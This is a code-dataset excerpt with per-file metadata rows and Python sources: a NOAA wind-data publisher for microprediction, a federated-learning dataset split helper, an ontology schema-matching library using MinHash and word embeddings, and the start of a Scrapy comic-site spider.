| 37.967742 | 125 | 0.776551 | 166 | 1,177 | 5.319277 | 0.198795 | 0.11325 | 0.050963 | 0.084938 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0.344281 | 0 | 0 | 0.119796 | 1,177 | 30 | 126 | 39.233333 | 0.852317 | 0 | 0 | 0 | 0 | 0 | 0.031436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.148148 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bae7bbd789ea3ac35f03b0a03ec727ec87d770c | 3,075 | py | Python | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | null | null | null | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | null | null | null | noaa.py | microprediction/windspeed | 0ea88079ac8ae8955c4ba5cbcf1cd1aed64beb10 | [
"MIT"
] | 1 | 2021-12-19T16:25:22.000Z | 2021-12-19T16:25:22.000Z | # New video tutorials are available at https://www.microprediction.com/python-1 to help you
# get started creating streams (see the 4th module in particular)
import logging
import urllib
import time
import pytz
import random
from datetime import datetime
from pprint import pprint
from microprediction import MicroWriter
import os
write_key = os.environ.get('WRITE_KEY') # GitHub action needs to set env variable. You need to create a GitHub secret called WRITE_KEY
mw = MicroWriter(write_key=write_key)
assert mw.key_difficulty(mw.write_key)>=13, "You need a key of difficulty 13 for copula streams"
mw.set_repository(url='https://github.com/microprediction/microprediction/blob/master/microprediction/live/seattle_wind.py') # courtesy
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
def wait_between_attempts():
""" Incremental backoff between connection attempts """
wait_time = 5.3 # time is in seconds
while True:
yield wait_time
wait_time = min(wait_time * 1.5, 30)
wait_time *= (100 + random.randint(0, 50)) / 100
wait_time = wait_between_attempts()
prev_data = None
idx = None
def fetch_live_data(location):
global prev_data
global idx
speed = 0
direction = 0
for retry_no in range(3):
try:
url = "https://www.ndbc.noaa.gov/data/5day2/"+location+"_5day.cwind"
print(url)
file = urllib.request.urlopen(url=url)
if file.status==200:
# NOTE: file is not indexable
for i, line in enumerate(file):
# most recent data is at line number 3 in the file
if i == 2:
data = line.decode("utf-8").split()
if prev_data == data:
idx -= 2
else:
prev_data = data
idx = 6
break
for i, line in enumerate(file):
if i == idx:
direction = float(data[5]) / 360 # normalize between [0, 1)
speed = float(data[6]) / 10 # attempt to normalize
return speed, direction
except:
logger.error("Connection error: reconnecting...")
time.sleep(next(wait_time))
return speed, direction
LOCATIONS_1 = ['41008','44005','46060','46061']
LOCATIONS_2 = ['46073','46076','46077','46078']
def fetch_data(locations):
names = list()
values = list()
for location in locations:
speed, direction = fetch_live_data(location=location)
names.append('noaa_wind_speed_'+location+'.json')
values.append(speed)
names.append('noaa_wind_direction_'+location+'.json')
values.append(direction)
return names, values
if __name__=='__main__':
for locations in [LOCATIONS_1,LOCATIONS_2]:
names, values = fetch_data(locations=locations)
res = mw.cset(names=names, values=values)
| 33.791209 | 137 | 0.609431 | 379 | 3,075 | 4.802111 | 0.430079 | 0.030769 | 0.020879 | 0.023077 | 0.025275 | 0.025275 | 0 | 0 | 0 | 0 | 0 | 0.040609 | 0.295285 | 3,075 | 90 | 138 | 34.166667 | 0.799262 | 0.145366 | 0 | 0.057971 | 0 | 0.014493 | 0.129353 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.217391 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb1e0e67d45581de03559a2275a7b5ca7ba495a | 3,384 | py | Python | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | 2 | 2021-11-14T12:04:39.000Z | 2022-01-03T16:03:36.000Z | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | null | null | null | shfl/data_base/data_base.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 9da392bf71c9acf13761dde0f119622c62780c87 | [
"Apache-2.0"
] | 1 | 2022-01-19T16:29:46.000Z | 2022-01-19T16:29:46.000Z | import abc
import numpy as np
def split_train_test(data, labels, dim):
"""
    Method that randomly chooses the train and test sets from data and labels.

    # Arguments:
        data: Numpy matrix with data from which to extract the test data
        labels: Numpy array with labels
        dim: Size of the test split

    # Returns:
        new_data: Train data, train labels, test data and test labels
"""
randomize = np.arange(len(labels))
np.random.shuffle(randomize)
data = data[randomize, ]
labels = labels[randomize]
test_data = data[0:dim, ]
test_labels = labels[0:dim]
rest_data = data[dim:, ]
rest_labels = labels[dim:]
return rest_data, rest_labels, test_data, test_labels
class DataBase(abc.ABC):
"""
Abstract class for data base.
    Load method must be implemented in order to create a database able to \
    interact with the system, specifically with the data distribution methods \
    (see: [Data Distribution](../data_distribution)).
Load method should save data in the protected Attributes:
# Attributes:
* **train_data, train_labels, test_data, test_labels**
# Properties:
train: Returns train data and labels
test: Returns test data and labels
data: Returns train data, train labels, validation data, validation labels, test data and test labels
"""
def __init__(self):
self._train_data = []
self._test_data = []
self._train_labels = []
self._test_labels = []
@property
def train(self):
return self._train_data, self._train_labels
@property
def test(self):
return self._test_data, self._test_labels
@property
def data(self):
return self._train_data, self._train_labels, self._test_data, self._test_labels
@abc.abstractmethod
def load_data(self):
"""
Abstract method that loads the data
"""
def shuffle(self):
"""
Shuffles all data
"""
randomize = np.arange(len(self._train_labels))
np.random.shuffle(randomize)
self._train_data = self._train_data[randomize, ]
self._train_labels = self._train_labels[randomize]
randomize = np.arange(len(self._test_labels))
np.random.shuffle(randomize)
self._test_data = self._test_data[randomize, ]
self._test_labels = self._test_labels[randomize]
class LabeledDatabase(DataBase):
"""
Class to create generic labeled database from data and labels vectors
# Arguments
data: Data features to load
labels: Labels for this features
        train_percentage: float between 0 and 1 indicating how much of the data is dedicated to training
"""
def __init__(self, data, labels, train_percentage=0.8):
super(DataBase, self).__init__()
self._data = data
self._labels = labels
self._train_percentage = train_percentage
def load_data(self):
"""
Load data
# Returns
all_data : train data, train labels, test data and test labels
"""
test_size = round(len(self._data) * (1 - self._train_percentage))
self._train_data, self._train_labels, \
self._test_data, self._test_labels = split_train_test(self._data, self._labels, test_size)
self.shuffle()
return self.data
| 28.677966 | 109 | 0.649232 | 423 | 3,384 | 4.959811 | 0.208038 | 0.064347 | 0.050048 | 0.040515 | 0.260725 | 0.177788 | 0.074357 | 0.074357 | 0.051478 | 0.051478 | 0 | 0.002816 | 0.265366 | 3,384 | 117 | 110 | 28.923077 | 0.84111 | 0.368794 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.04 | 0.06 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb2c6977e580018666f892e53fb97c55744bde7 | 26,945 | py | Python | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | null | null | null | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | 6 | 2020-06-05T17:52:29.000Z | 2021-06-10T19:44:58.000Z | ontomatch/matcher_lib.py | RogerTangos/aurum_debug | fa3afd96c795e9b674a5951430635d43aa3f5c78 | [
"MIT"
] | null | null | null | from enum import Enum
import time
from collections import defaultdict
from nltk.corpus import stopwords
from dataanalysis import nlp_utils as nlp
from ontomatch import glove_api
from ontomatch import ss_utils as SS
from datasketch import MinHash, MinHashLSH
from knowledgerepr.networkbuilder import LSHRandomProjectionsIndex
from dataanalysis import dataanalysis as da
import operator
from collections import namedtuple
class MatchingType(Enum):
L1_CLASSNAME_ATTRVALUE = 0
L2_CLASSVALUE_ATTRVALUE = 1
L3_CLASSCTX_RELATIONCTX = 2
L4_CLASSNAME_RELATIONNAME_SYN = 3
L42_CLASSNAME_RELATIONNAME_SEM = 4
L5_CLASSNAME_ATTRNAME_SYN = 5
L52_CLASSNAME_ATTRNAME_SEM = 6
L6_CLASSNAME_RELATION_SEMSIG = 7
L7_CLASSNAME_ATTRNAME_FUZZY = 8
class SimpleTrie:
def __init__(self):
self._leave = "_leave_"
self.root = dict()
def add_sequences(self, sequences):
for seq in sequences:
current_dict = self.root
for token in seq:
current_dict = current_dict.setdefault(token, {}) # another dict as default
current_dict[self._leave] = self._leave
return self.root
def longest_prefix(self):
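        # placeholder: longest-common-prefix lookup over the trie is not implemented yet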
return
class Matching:
def __init__(self, db_name, source_name):
self.db_name = db_name
self.source_name = source_name
self.source_level_matchings = defaultdict(lambda: defaultdict(list))
self.attr_matchings = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
def add_relation_correspondence(self, kr_name, class_name, matching_type):
self.source_level_matchings[kr_name][class_name].append(matching_type)
def add_attribute_correspondence(self, attr_name, kr_name, class_name, matching_type):
self.attr_matchings[attr_name][kr_name][class_name].append(matching_type)
def __str__(self):
header = self.db_name + " - " + self.source_name
relation_matchings = list()
relation_matchings.append(header)
if len(self.source_level_matchings.items()) > 0:
for kr_name, values in self.source_level_matchings.items():
for class_name, matchings in values.items():
line = kr_name + " - " + class_name + " : " + str(matchings)
relation_matchings.append(line)
else:
line = "0 relation matchings"
relation_matchings.append(line)
if len(self.attr_matchings.items()) > 0:
for attr_name, values in self.attr_matchings.items():
for kr_name, classes in values.items():
for class_name, matchings in classes.items():
line = attr_name + " -> " + kr_name + " - " + class_name + " : " + str(matchings)
relation_matchings.append(line)
string_repr = '\n'.join(relation_matchings)
return string_repr
def print_serial(self):
relation_matchings = []
for kr_name, values in self.source_level_matchings.items():
for class_name, matchings in values.items():
line = self.db_name + " %%% " + self.source_name + " %%% _ -> " + kr_name \
+ " %%% " + class_name + " %%% " + str(matchings)
relation_matchings.append(line)
for attr_name, values in self.attr_matchings.items():
for kr_name, classes in values.items():
for class_name, matchings in classes.items():
line = self.db_name + " %%% " + self.source_name + " %%% " + attr_name \
+ " -> " + kr_name + " %%% " + class_name + " %%% " + str(matchings)
relation_matchings.append(line)
#string_repr = '\n'.join(relation_matchings)
return relation_matchings
def combine_matchings(all_matchings):
def process_attr_matching(building_matching_objects, m, matching_type):
sch, krn = m
db_name, source_name, field_name = sch
kr_name, class_name = krn
mobj = building_matching_objects.get((db_name, source_name), None)
if mobj is None:
mobj = Matching(db_name, source_name)
mobj.add_attribute_correspondence(field_name, kr_name, class_name, matching_type)
building_matching_objects[(db_name, source_name)] = mobj
def process_relation_matching(building_matching_objects, m, matching_type):
sch, krn = m
db_name, source_name, field_name = sch
kr_name, class_name = krn
mobj = building_matching_objects.get((db_name, source_name), None)
if mobj is None:
mobj = Matching(db_name, source_name)
mobj.add_relation_correspondence(kr_name, class_name, matching_type)
building_matching_objects[(db_name, source_name)] = mobj
l1_matchings = all_matchings[MatchingType.L1_CLASSNAME_ATTRVALUE]
l2_matchings = all_matchings[MatchingType.L2_CLASSVALUE_ATTRVALUE]
l4_matchings = all_matchings[MatchingType.L4_CLASSNAME_RELATIONNAME_SYN]
l42_matchings = all_matchings[MatchingType.L42_CLASSNAME_RELATIONNAME_SEM]
l5_matchings = all_matchings[MatchingType.L5_CLASSNAME_ATTRNAME_SYN]
l52_matchings = all_matchings[MatchingType.L52_CLASSNAME_ATTRNAME_SEM]
l6_matchings = all_matchings[MatchingType.L6_CLASSNAME_RELATION_SEMSIG]
l7_matchings = all_matchings[MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY]
building_matching_objects = defaultdict(None) # (db_name, source_name) -> stuff
for m in l1_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L1_CLASSNAME_ATTRVALUE)
for m in l2_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L2_CLASSVALUE_ATTRVALUE)
for m in l4_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L4_CLASSNAME_RELATIONNAME_SYN)
for m in l42_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L42_CLASSNAME_RELATIONNAME_SEM)
for m in l5_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L5_CLASSNAME_ATTRNAME_SYN)
for m in l52_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L52_CLASSNAME_ATTRNAME_SEM)
for m in l6_matchings:
process_relation_matching(building_matching_objects, m, MatchingType.L6_CLASSNAME_RELATION_SEMSIG)
for m in l7_matchings:
process_attr_matching(building_matching_objects, m, MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY)
return building_matching_objects
def combine_matchings2(all_matchings):
# TODO: divide running score, based on whether content was available or not (is it really necessary?)
# L1 creates its own matchings
l1_matchings = all_matchings[MatchingType.L1_CLASSNAME_ATTRVALUE]
# L2, L5, L52 and L6 create another set of matchings
l2_matchings = all_matchings[MatchingType.L2_CLASSVALUE_ATTRVALUE]
l5_matchings = all_matchings[MatchingType.L5_CLASSNAME_ATTRNAME_SYN]
l52_matchings = all_matchings[MatchingType.L52_CLASSNAME_ATTRNAME_SEM]
l6_matchings = all_matchings[MatchingType.L6_CLASSNAME_RELATION_SEMSIG]
l7_matchings = all_matchings[MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY]
l_combined = dict()
for schema, kr in l1_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L1_CLASSNAME_ATTRVALUE])
for schema, kr in l7_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L7_CLASSNAME_ATTRNAME_FUZZY)
for schema, kr in l2_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
                MatchingType.L2_CLASSVALUE_ATTRVALUE)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L2_CLASSVALUE_ATTRVALUE])
for schema, kr in l5_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L5_CLASSNAME_ATTRNAME_SYN)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L5_CLASSNAME_ATTRNAME_SYN])
for schema, kr in l52_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L52_CLASSNAME_ATTRNAME_SEM)
else:
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)] = (
(schema, kr), [MatchingType.L52_CLASSNAME_ATTRNAME_SEM])
for schema, kr in l6_matchings:
db_name, src_name, attr_name = schema
kr_name, cla_name = kr
if (db_name, src_name, attr_name, kr_name, cla_name) in l_combined:
            # TODO: only append if the matching types are something other than L1?
l_combined[(db_name, src_name, attr_name, kr_name, cla_name)][1].append(
MatchingType.L6_CLASSNAME_RELATION_SEMSIG)
# L4 and L42 have their own matching too
l4_matchings = all_matchings[MatchingType.L4_CLASSNAME_RELATIONNAME_SYN]
combined_matchings = []
for key, values in l_combined.items():
matching = values[0]
matching_types = values[1]
# for el in values:
# matching = el[0]
# matching_types = el[1]
combined_matchings.append((matching, matching_types))
combined_matchings = sorted(combined_matchings, key=lambda x: len(x[1]), reverse=True)
return combined_matchings, l4_matchings
def find_relation_class_attr_name_sem_matchings(network, kr_handlers):
# Retrieve relation names
#self.find_relation_class_name_sem_matchings()
st = time.time()
names = []
seen_fields = []
for (db_name, source_name, field_name, _) in network.iterate_values():
orig_field_name = field_name
if field_name not in seen_fields:
            seen_fields.append(field_name)  # mark as seen
field_name = nlp.camelcase_to_snakecase(field_name)
field_name = field_name.replace('-', ' ')
field_name = field_name.replace('_', ' ')
field_name = field_name.lower()
svs = []
for token in field_name.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('attribute', (db_name, source_name, orig_field_name), svs))
num_attributes_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('class', (kr_name, original_cl_name), svs))
matchings = []
for idx_rel in range(0, num_attributes_inserted): # Compare only with classes
for idx_class in range(num_attributes_inserted, len(names)):
svs_rel = names[idx_rel][2]
svs_cla = names[idx_class][2]
semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla)
if semantic_sim > 0.8:
                # match format: db_name, source_name, field_name -> class_name
match = ((names[idx_rel][1][0], names[idx_rel][1][1], names[idx_rel][1][2]), names[idx_class][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (sem): " + str(et - st))
return matchings
def find_relation_class_attr_name_matching(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_fields = []
for (db_name, source_name, field_name, _) in network.iterate_values():
orig_field_name = field_name
if field_name not in seen_fields:
seen_fields.append(field_name) # seen already
field_name = nlp.camelcase_to_snakecase(field_name)
field_name = field_name.replace('-', ' ')
field_name = field_name.replace('_', ' ')
field_name = field_name.lower()
m = MinHash(num_perm=64)
for token in field_name.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('attribute', (db_name, source_name, orig_field_name), m))
num_attributes_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
m = MinHash(num_perm=64)
for token in cl.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('class', (kr_name, original_cl_name), m))
# Index all the minhashes
lsh_index = MinHashLSH(threshold=0.6, num_perm=64)
for idx in range(len(names)):
lsh_index.insert(idx, names[idx][2])
matchings = []
for idx in range(0, num_attributes_inserted): # Compare only with classes
N = lsh_index.query(names[idx][2])
for n in N:
kind_q = names[idx][0]
kind_n = names[n][0]
if kind_n != kind_q:
                # match format: db_name, source_name, field_name -> class_name
match = ((names[idx][1][0], names[idx][1][1], names[idx][1][2]), names[n][1])
matchings.append(match)
return matchings
def find_relation_class_name_sem_matchings(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_sources = []
for (db_name, source_name, _, _) in network.iterate_values():
original_source_name = source_name
if source_name not in seen_sources:
            seen_sources.append(source_name)  # mark as seen
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
svs = []
for token in source_name.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
#if sv is not None:
svs.append(sv) # append even None, to apply penalization later
names.append(('relation', (db_name, original_source_name), svs))
num_relations_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
#if sv is not None:
svs.append(sv) # append even None, to apply penalization later
names.append(('class', (kr_name, original_cl_name), svs))
matchings = []
for idx_rel in range(0, num_relations_inserted): # Compare only with classes
for idx_class in range(num_relations_inserted, len(names)):
svs_rel = names[idx_rel][2]
svs_cla = names[idx_class][2]
semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla, penalize_unknown_word=True, add_exact_matches=False)
#semantic_sim = SS.compute_semantic_similarity(svs_rel, svs_cla)
if semantic_sim > 0.5:
                # match format: db_name, source_name, field_name -> class_name
match = ((names[idx_rel][1][0], names[idx_rel][1][1], "_"), names[idx_class][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (sem): " + str(et - st))
return matchings
def find_relation_class_name_matchings(network, kr_handlers):
# Retrieve relation names
st = time.time()
names = []
seen_sources = []
for (db_name, source_name, _, _) in network.iterate_values():
original_source_name = source_name
if source_name not in seen_sources:
            seen_sources.append(source_name)  # mark as seen
source_name = nlp.camelcase_to_snakecase(source_name)
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
m = MinHash(num_perm=32)
for token in source_name.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('relation', (db_name, original_source_name), m))
num_relations_inserted = len(names)
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
m = MinHash(num_perm=32)
for token in cl.split():
if token not in stopwords.words('english'):
m.update(token.encode('utf8'))
names.append(('class', (kr_name, original_cl_name), m))
# Index all the minhashes
lsh_index = MinHashLSH(threshold=0.5, num_perm=32)
for idx in range(len(names)):
lsh_index.insert(idx, names[idx][2])
matchings = []
for idx in range(0, num_relations_inserted): # Compare only with classes
N = lsh_index.query(names[idx][2])
for n in N:
kind_q = names[idx][0]
kind_n = names[n][0]
if kind_n != kind_q:
                # match format: db_name, source_name, field_name -> class_name
match = ((names[idx][1][0], names[idx][1][1], "_"), names[n][1])
matchings.append(match)
et = time.time()
print("Time to relation-class (name): " + str(et - st))
return matchings
def __find_relation_class_matchings(self):
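    # NOTE: written as an instance method (it uses self.network and
    # self.kr_handlers), so it must be attached to a class to run; kept here
    # for reference.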
# Retrieve relation names
st = time.time()
docs = []
names = []
seen_sources = []
for (_, source_name, _, _) in self.network.iterate_values():
if source_name not in seen_sources:
            seen_sources.append(source_name)  # mark as seen
source_name = source_name.replace('-', ' ')
source_name = source_name.replace('_', ' ')
source_name = source_name.lower()
docs.append(source_name)
names.append(('relation', source_name))
# Retrieve class names
for kr_item, kr_handler in self.kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
docs.append(cl)
names.append(('class', cl))
tfidf = da.get_tfidf_docs(docs)
et = time.time()
print("Time to create docs and TF-IDF: ")
print("Create docs and TF-IDF: {0}".format(str(et - st)))
num_features = tfidf.shape[1]
new_index_engine = LSHRandomProjectionsIndex(num_features, projection_count=7)
    # O(N^2) brute-force method (disabled; kept for reference)
"""
clean_matchings = []
for i in range(len(docs)):
for j in range(len(docs)):
sparse_row = tfidf.getrow(i)
dense_row = sparse_row.todense()
array_i = dense_row.A[0]
sparse_row = tfidf.getrow(j)
dense_row = sparse_row.todense()
array_j = dense_row.A[0]
sim = np.dot(array_i, array_j.T)
if sim > 0.5:
if names[i][0] != names[j][0]:
match = names[i][1], names[j][1]
clean_matchings.append(match)
return clean_matchings
"""
# Index vectors in engine
st = time.time()
for idx in range(len(docs)):
sparse_row = tfidf.getrow(idx)
dense_row = sparse_row.todense()
array = dense_row.A[0]
new_index_engine.index(array, idx)
et = time.time()
print("Total index text: " + str((et - st)))
# Now query for similar ones:
raw_matchings = defaultdict(list)
for idx in range(len(docs)):
sparse_row = tfidf.getrow(idx)
dense_row = sparse_row.todense()
array = dense_row.A[0]
N = new_index_engine.query(array)
if len(N) > 1:
for n in N:
(data, key, value) = n
raw_matchings[idx].append(key)
et = time.time()
print("Find raw matches: {0}".format(str(et - st)))
# Filter matches so that only relation-class ones appear
clean_matchings = []
for key, values in raw_matchings.items():
key_kind = names[key][0]
for v in values:
v_kind = names[v][0]
if v_kind != key_kind:
match = (names[key][1], names[v][1])
clean_matchings.append(match)
return clean_matchings
def find_sem_coh_matchings(network, kr_handlers):
matchings = []
matchings_special = []
# Get all relations with groups
table_groups = dict()
for db, t, attrs in SS.read_table_columns(None, network=network):
groups = SS.extract_cohesive_groups(t, attrs)
table_groups[(db, t)] = groups # (score, [set()])
names = []
# Retrieve class names
for kr_name, kr_handler in kr_handlers.items():
all_classes = kr_handler.classes()
for cl in all_classes:
original_cl_name = cl
cl = nlp.camelcase_to_snakecase(cl)
cl = cl.replace('-', ' ')
cl = cl.replace('_', ' ')
cl = cl.lower()
svs = []
for token in cl.split():
if token not in stopwords.words('english'):
sv = glove_api.get_embedding_for_word(token)
if sv is not None:
svs.append(sv)
names.append(('class', (kr_name, original_cl_name), svs))
for db_table_info, groups in table_groups.items():
db_name, table_name = db_table_info
class_seen = [] # to filter out already seen classes
for g_score, g_tokens in groups:
g_svs = []
for t in g_tokens:
sv = glove_api.get_embedding_for_word(t)
if sv is not None:
g_svs.append(sv)
for _, class_info, class_svs in names:
kr_name, class_name = class_info
sim = SS.compute_semantic_similarity(class_svs, g_svs)
if sim > g_score and class_name not in class_seen:
class_seen.append(class_name)
match = ((db_name, table_name, "_"), (kr_name, class_name))
matchings.append(match)
"""
similar = SS.groupwise_semantic_sim(class_svs, g_svs, 0.7)
if similar:
class_seen.append(class_name)
match = ((db_name, table_name, "_"), (kr_name, class_name))
matchings_special.append(match)
continue
"""
return matchings, table_groups #, matchings_special
cutoff_likely_match_threshold = 0.4
min_relevance_score = 0.2
scoring_threshold = 0.4
min_classes = 50
def find_hierarchy_content_fuzzy(kr_handlers, store):
matchings = []
    # access class names per hierarchical level (an assumption that makes sense here)
for kr_name, kr in kr_handlers.items():
ch = kr.class_hierarchy
for ch_name, ch_classes in ch:
if len(ch_classes) < min_classes: # do this only for longer hierarchies
continue
# query elastic for fuzzy matches
matching_evidence = defaultdict(int)
for class_id, class_name in ch_classes:
matches = store.fuzzy_keyword_match(class_name)
keys_in_matches = set()
for m in matches:
# record
if m.score > min_relevance_score:
key = (m.db_name, m.source_name, m.field_name)
keys_in_matches.add(key)
for k in keys_in_matches:
matching_evidence[k] += 1
num_classes = len(ch_classes)
num_potential_matches = len(matching_evidence.items())
cutoff_likely_match = float(num_potential_matches/num_classes)
            if cutoff_likely_match > cutoff_likely_match_threshold:  # exceeds the cutoff threshold, so skip this hierarchy
continue
sorted_matching_evidence = sorted(matching_evidence.items(), key=operator.itemgetter(1), reverse=True)
# a perfect match would score 1
for key, value in sorted_matching_evidence:
score = float(value/num_classes)
if score > scoring_threshold:
match = (key, (kr_name, ch_name))
matchings.append(match)
else:
                    break  # ordered, so once one does not comply, no one else does
return matchings
if __name__ == "__main__":
print("Matcher lib")
st = SimpleTrie()
sequences = [["a", "b", "c", "d"], ["a", "b", "c", "v"], ["a", "b", "c"], ["a", "b", "c", "lk"]]
root = st.add_sequences(sequences)
print(root)
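    # Expected shape of `root` (a nested-dict trie): the four sequences share the
    # prefix a -> b -> c, which then branches into the leaf marker, d, v and lk.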
| 40.825758 | 128 | 0.618148 | 3,401 | 26,945 | 4.598941 | 0.097912 | 0.040279 | 0.029538 | 0.020459 | 0.689981 | 0.649575 | 0.629435 | 0.616329 | 0.589732 | 0.530145 | 0 | 0.011198 | 0.284134 | 26,945 | 659 | 129 | 40.887709 | 0.799679 | 0.070069 | 0 | 0.555777 | 0 | 0 | 0.021567 | 0 | 0 | 0 | 0 | 0.001517 | 0 | 1 | 0.037849 | false | 0 | 0.023904 | 0.001992 | 0.111554 | 0.01992 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bb3cf7dfd698c8727e5eccdcdcd702e3c271a0e | 3,034 | py | Python | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | details/details/spiders/truyenqq.py | mantranit/vncomics-server | bcf5a45975e393162c9b44daf8c620b6b73292b3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
import requests
import pymongo
import time
import re
from datetime import datetime
from details.items import DetailsItem
class TruyenqqSpider(scrapy.Spider):
name = 'truyenqq'
